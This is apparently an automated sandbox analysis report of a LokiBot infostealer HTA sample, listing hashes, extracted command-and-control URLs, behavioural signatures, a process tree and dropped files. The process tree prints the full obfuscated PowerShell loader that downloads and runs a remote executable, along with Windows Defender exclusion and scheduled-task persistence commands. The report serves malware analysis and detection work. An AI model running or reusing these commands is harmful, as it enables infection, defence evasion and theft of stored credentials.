Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 07:35
Static task
static1
Behavioral task
behavioral1
Sample
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta
Resource
win10v2004-20241007-en
General
-
Target
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta
-
Size
178KB
-
MD5
4ce3b0e612e1968b6c491ab1ab818884
-
SHA1
cbc890a816e9b7e993c90fb63d51526a76616323
-
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
-
SHA512
9b87141b10a2e781e51483dced485817aeb34b545f6dbf64803b4b3621cd4dd74587a5033ab1aa3b931fbd39bc7c77650a0ccdd6b4132b48fbeab9d0fbb3d816
-
SSDEEP
96:4vCl17HUofTaTGoHTapZR3CyYaMJhS1i3hTaNopQ:4vCldHULTG3pZLYKi3gN2Q
Malware Config
Extracted
lokibot
http://94.156.177.41/simple/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2744 pOweRShelL.EXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 112 powershell.exe 3024 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2744 pOweRShelL.EXe 2760 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2640 caspol.exe 2244 caspol.exe -
Loads dropped DLL 3 IoCs
pid Process 2744 pOweRShelL.EXe 2744 pOweRShelL.EXe 2744 pOweRShelL.EXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2640 set thread context of 2244 2640 caspol.exe 43 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOweRShelL.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caspol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1968 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2744 pOweRShelL.EXe 2760 powershell.exe 2640 caspol.exe 112 powershell.exe 3024 powershell.exe 2640 caspol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2744 pOweRShelL.EXe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2640 caspol.exe Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 2244 caspol.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2772 wrote to memory of 2744 2772 mshta.exe 30 PID 2772 wrote to memory of 2744 2772 mshta.exe 30 PID 2772 wrote to memory of 2744 2772 mshta.exe 30 PID 2772 wrote to memory of 2744 2772 mshta.exe 30 PID 2744 wrote to memory of 2760 2744 pOweRShelL.EXe 32 PID 2744 wrote to memory of 2760 2744 pOweRShelL.EXe 32 PID 2744 wrote to memory of 2760 2744 pOweRShelL.EXe 32 PID 2744 wrote to memory of 2760 2744 pOweRShelL.EXe 32 PID 2744 wrote to memory of 2592 2744 pOweRShelL.EXe 33 PID 2744 wrote to memory of 2592 2744 pOweRShelL.EXe 33 PID 2744 wrote to memory of 2592 2744 pOweRShelL.EXe 33 PID 2744 wrote to memory of 2592 2744 pOweRShelL.EXe 33 PID 2592 wrote to memory of 1056 2592 csc.exe 34 PID 2592 wrote to memory of 1056 2592 csc.exe 34 PID 2592 wrote to memory of 1056 2592 csc.exe 34 PID 2592 wrote to memory of 1056 2592 csc.exe 34 PID 2744 wrote to memory of 2640 2744 pOweRShelL.EXe 36 PID 2744 wrote to memory of 2640 2744 pOweRShelL.EXe 36 PID 2744 wrote to memory of 2640 2744 pOweRShelL.EXe 36 PID 2744 wrote to memory of 2640 2744 pOweRShelL.EXe 36 PID 2640 wrote to memory of 112 2640 caspol.exe 37 PID 2640 wrote to memory of 112 2640 caspol.exe 37 PID 2640 wrote to memory of 112 2640 caspol.exe 37 PID 2640 wrote to memory of 112 2640 caspol.exe 37 PID 2640 wrote to memory of 3024 2640 caspol.exe 39 PID 2640 wrote to memory of 3024 2640 caspol.exe 39 PID 2640 wrote to memory of 3024 2640 caspol.exe 39 PID 2640 wrote to memory of 3024 2640 caspol.exe 39 PID 2640 wrote to memory of 1968 2640 caspol.exe 40 PID 2640 wrote to memory of 1968 2640 caspol.exe 40 PID 2640 wrote to memory of 1968 2640 caspol.exe 40 PID 2640 wrote to memory of 1968 2640 caspol.exe 40 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 PID 2640 wrote to memory of 2244 2640 caspol.exe 43 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1968
-
-
C:\Users\Admin\AppData\Roaming\caspol.exe"C:\Users\Admin\AppData\Roaming\caspol.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2244
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51629b742fe9bb12ee231b3cf19c56c75
SHA1eea0867318da1607efac26814417f02f4143e373
SHA2560e8b76d9c7446dd4b7612c1ef4c42697508915df84119deb8ebf7db29843796e
SHA512badd29397ad0aa758138b7b2c2419aa607b51adcd9b8a04f7ed20cafbe268550065a4337b3a7c7773f105988eac88585f4f7a218a9ce98cf36b13bfb308995c7
-
Filesize
3KB
MD5b45173682a7449f2b958017b4acec059
SHA1900a06b161ba8675f40b698b0d2cfe6120b169c6
SHA256f0b2b5ee2383e6470967e412b5a6000c3e7d2ad6e700513cebbc07719e2c1a6e
SHA5121105b44b3820178fb46fa265e5ff401ac53f3e979e3cd5f6a2c2c29f426325fd6faf16ada178f0e9becfef8c7e3cbbd3dffd68adcaf63ec5609b0c7d1da157a2
-
Filesize
7KB
MD59e16775089f02993bcd37f5ecfc46785
SHA11116e44a47e0adc235d054081386bb617933d42b
SHA256ea8bf6580c01da53bc451ffa25fced942fbe68f3ed2e70341f0066c06ee965fb
SHA5129655eb77c2057471f80a538385887929bdbbf23868e6a9d316da60d7e104e6a793578c3ffc46d66604fdd21fa1030a3d34276c4011781b549d6048326821712a
-
Filesize
1KB
MD51b67e8cceed149b21087e5f364860141
SHA138836c472a49a5b993bf43b87b8c345961e3a0d9
SHA2565d0543738b465abe90478a6ceeacff369ccd6b9edfcd686f1f75a9f3adc9784c
SHA512791c32dd134067ebc489032b0a87abb901790bd2218596f39bc2c9bd520ef0cc549956da3d06f6f2c55679321ed41289005aade54a7ccab85030f9c41b3daa7c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5511c43e75c660df11a98089d2e722ac8
SHA129b4b67e219af20e607ed6eb4fb23e734bf31aeb
SHA2569048bc13b8c28e44128a61ff7c76415f52420853bf01dbebaf501eb03ee584b0
SHA512e93c17a8fd030615db054a4478337cab201779735bcfb2639c8ed723c16b3728e001811a1a236357391e497d3a349e9d9a05278c28816be28d57be8df959f977
-
Filesize
586KB
MD574061922f1e78c237a66d12a15a18181
SHA1e31ee444aaa552a100f006e43f0810497a3b0387
SHA25689bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c
SHA512306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136
-
Filesize
652B
MD508231841e49d0ff1e44000a2138277d4
SHA17b33e37d162578c4da5f4bff81e299bf58158b95
SHA2564cd2cb49122215ee415c3d7272d2bb48f2d2415638bc063dbec22f12d1412fb8
SHA5128996d94dae69d179c83e874d9453c95bc9ccd637ce5a8a4de64ccc5117c3bc5179805949a6d348c3ecc4afb6a4e76abfce3ee69dddfe281aec9e882dadd243c8
-
Filesize
484B
MD5fe82050659a8b97690d60529499222c1
SHA17cc50135852b46dd1e36f2ff98506613db525a68
SHA25664c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a
SHA51259356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f
-
Filesize
309B
MD53e99a2c1b3a3cfdd8870f044bbe0ae07
SHA1f57021d4745ce760b37e2806ca6ebc9dbe9d47fd
SHA256740a640a03f70647d38fe6fd169a9c4371ad82cfc206d12665515f1db7a08ec3
SHA512306642a7c023135a30eb2b2ced06aaf7dbebf2ffd0f3a02195ab1298c54cbbbfbab003f96fa265aa4b8472a0b1876fe6aab94620ce13935bf02ed4b3cb983643